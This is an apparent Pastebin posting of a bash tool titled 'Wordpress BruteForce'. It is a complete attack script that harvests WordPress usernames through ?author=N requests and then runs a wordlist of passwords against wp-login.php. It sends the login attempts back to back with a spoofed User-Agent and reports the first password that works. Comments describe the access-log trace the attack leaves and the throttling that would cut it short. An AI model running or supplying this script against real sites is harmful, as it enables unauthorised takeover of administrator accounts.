AZZATSSINS_CYBERSERK

Wordpress BruteForce

Dec 22nd, 2019
Bash 2.26 KB | None | 0 0
  1. #! /bin/bash
  2.  
  3. USER_AGENT="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0"
  4. TIMEOUT=1
  5. COOKIE=cookie-`date +%s`
  6. COOKIE_PATH="/tmp/$COOKIE"
  7.  
  8. # Help
help_man(){
    # Option summary: one tab-aligned row per option, then a blank line.
    printf 'Arguments:\n'
    printf '\t%s\t\t%s\n' '--url' 'wordpress url'
    printf '\t%s\t\t%s\n' '--user' 'wordpress username'
    printf '\t%s\t%s\n' '--wordlist' 'path to password wordlist'
    printf '\n'

    # The two invocation forms the script accepts, separated by a blank line.
    printf '%s\n' \
        'User Enumeration:' \
        './wpbrute.sh --url=www.example.com' \
        '' \
        'Password Bruteforce:' \
        './wpbrute.sh --url=www.example.com --user=admin --wordlist=wordlist.txt'
}
  13.  
  14.  
  15. # Test wordpress url
test_url(){
    # HEAD request for the login page, keeping only the status code. No -A is
    # given here, so this probe goes out with curl's default User-Agent rather
    # than $USER_AGENT. $WP_URL is expanded unquoted, as in the rest of the
    # script.
    CHECK_URL=$(curl -s -I -o /dev/null -w '%{http_code}\n' $WP_URL/wp-login.php)

    # Any status other than 200 prints the URL and the code, then ends the
    # script.
    if [ "$CHECK_URL" -ne 200 ]
    then
        echo -e "Url error: $WP_URL\nHTTP CODE: $CHECK_URL"
        exit
    fi
}
  20.  
  21. # User Enumeration
user_enum(){
    # Lists author names by requesting /?author=1 through /?author=5 and
    # reading the name back out of each response, then ends the script.
    echo "[+] Username or nickname enumeration"
    # Five sequential GETs for ?author=N from one client, all with the fixed
    # $USER_AGENT, are the access-log trace of this step.
    for i in {1..5}
    do
        # -L follows redirects and -i prints response headers, so both the
        # Location header and the final page are searched. The first grep keeps
        # either a Location line or a "View all posts by ..." title attribute;
        # the sed/grep chain then turns "/" into spaces, keeps what follows
        # "author ", and drops quotes and empty lines. A site whose responses
        # contain neither pattern gives this loop nothing to print.
        curl -s -A "$USER_AGENT" -L -i $WP_URL/?author=$i | grep -E -o "\" title=\"View all posts by [a-sz0-9A-Z\-\.]*.*\" |Location:.*" | sed 's/\// /g' | grep -o "author .*" | sed 's/author //g' | sed 's/\"//g' | grep -v "^$"
    done
    exit
}
  30.  
  31. # ===================== START =====================
  32.  
# Get arguments
# $@ is expanded unquoted, so the argument list is re-split on whitespace; the
# resulting element count alone selects the mode below.
args_array=( $@ )
len_args=${#args_array[@]}

# Check arguments
# One argument: enumeration mode. user_enum ends with exit, so nothing after
# this if-block runs in that mode.
if [ "$len_args" -eq 1 ]; then
    # Take the text after "--url=" up to the next "=" or space.
    WP_URL=`echo $@ | grep -o "\-\-url=.*" | cut -d\= -f2 | cut -d" " -f1`
    test_url
    user_enum
fi

# Anything other than exactly three arguments prints the usage text and stops.
if [ "$len_args" -ne 3 ]; then
    help_man
    exit
else
    # Get value
    # Each option is looked up by name in the joined argument string, so the
    # three --name=value arguments can be given in any order.
    WP_ADMIN=`echo $@ | grep -o "\-\-user=.*" | cut -d\= -f2 | cut -d" " -f1`
    # Despite its name, WP_PASSWORD holds the wordlist path, not a password.
    WP_PASSWORD=`echo $@ | grep -o "\-\-wordlist=.*" | cut -d\= -f2 | cut -d" " -f1`
    if [ ! -f "$WP_PASSWORD" ]; then echo "Wordlist not found: $WP_PASSWORD"; exit; fi
    WP_URL=`echo $@ | grep -o "\-\-url=.*" | cut -d\= -f2 | cut -d" " -f1`
    test_url
fi
  55.  
# Get cookie
# One GET of the login page fills the cookie jar that every later POST replays
# with -b.
curl -s -A "$USER_AGENT" -c "$COOKIE_PATH" $WP_URL/wp-login.php > /dev/null

# Bruteforce
# One POST to wp-login.php per wordlist line, issued back to back with no
# delay, each carrying the same User-Agent, the same cookie jar and the form
# fields log, pwd, wp-submit, redirect_to and testcookie=1. In server logs
# that is a run of login POSTs from one client that differ only in pwd, the
# pattern that per-account or per-address login throttling is meant to cut
# short.
echo "[+] Bruteforcing user [$WP_ADMIN]"
# The loop is the right-hand side of a pipe, so it runs in a subshell.
cat "$WP_PASSWORD" | while read line;
    do {
        # Every candidate is printed to stdout before it is tried.
        echo $line
        REQ=`curl -s -b "$COOKIE_PATH" -A "$USER_AGENT" --connect-timeout $TIMEOUT -d log="$WP_ADMIN" -d pwd="$line" -d wp-submit="Log In" -d redirect_to="$WP_URL/wp-admin" -d testcookie=1 $WP_URL/wp-login.php`

        # An empty response body is the only success signal. -L is not passed,
        # so a redirect is not followed; presumably an accepted login answers
        # with a body-less redirect (TODO confirm against the WordPress version
        # in use). A request that fails to connect within $TIMEOUT second also
        # leaves REQ empty and is reported the same way, so a server that drops
        # these connections makes the script announce a wrong password and stop.
        if [ "$REQ" == "" ]; then echo "The password is: $line"; rm "$COOKIE_PATH"; exit; fi
    }
    done

# Remove cookie
# The exit above only leaves the loop's subshell, so this line is reached on
# both outcomes; stderr is discarded because the jar may already be gone.
rm "$COOKIE_PATH" 2> /dev/null